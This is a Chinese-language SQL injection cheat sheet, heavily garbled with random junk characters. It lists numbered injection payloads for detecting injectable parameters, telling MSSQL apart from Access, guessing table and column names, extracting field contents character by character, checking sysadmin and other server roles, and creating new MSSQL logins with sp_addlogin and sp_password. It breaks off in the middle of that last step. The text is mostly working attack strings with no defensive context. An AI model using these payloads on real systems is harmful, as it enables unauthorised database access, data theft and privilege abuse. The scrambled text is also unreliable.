1.判断是否有注入;and 1=1 ;and 1=2 I~l_ky|a !
2.初步判断是否是mssql ;and user>0 |6d:k~p
l]|&j`'O
3.注入参数是字符'and [查询条件] and ''=' bpsyO>lx/
G5qsnTxUJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' k
Fl*Im
8nI~iN?"
5.判断数据库系统 [g}^{ $`
N,w6
;and (select count(*) from sysobjects)>0 mssql q<\r}1Dm
+_:p8,
5o
;and (select count(*) from msysobjects)>0 access |!K&h(J|
|6NvByc,
:vi %7
]/!*^;cY(
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Q+f|.0r
!}c D e12
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @16y%]Q-E#
IRM jL.q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 %enJ[a%Qg
` .`:~_OE
9.(1)猜字段的ascii值(access) ]}SV%*{%
s;h`n$
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 f@Mku0VT
PE7V1U#$o,
(2)猜字段的ascii值(mssql) '0 Ys`Qo
+]t9kr
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 >kAJS??
1%M^MT%&
10.测试权限结构(mssql) leHKBu'd
QqL?? p-S>
~oOv/1v},
2h5T$[fV
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- (a!E3y5,
e~QLzZ3
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j 1'H|4
NHZMH!=4:n
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- crd|r."
yYOV:3!"
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 6AD&%v
VFV8ik)
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- XXwIp-'
sUF5Yq:9
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- VII`qbxT
P9\y~W
;and 1=(select IS_MEMBER('db_owner'));-- qjfv9sU
^ &KH|qRrO
y3*IF2G
N
cHCcc
11.添加mssql和系统的帐户 J'cE@(US
.WOF:Nu4
;exec master.dbo.sp_addlogin username;-- @W+8z#xr'
;exec master.dbo.sp_password null,username,password;-- 21$^k5
KI<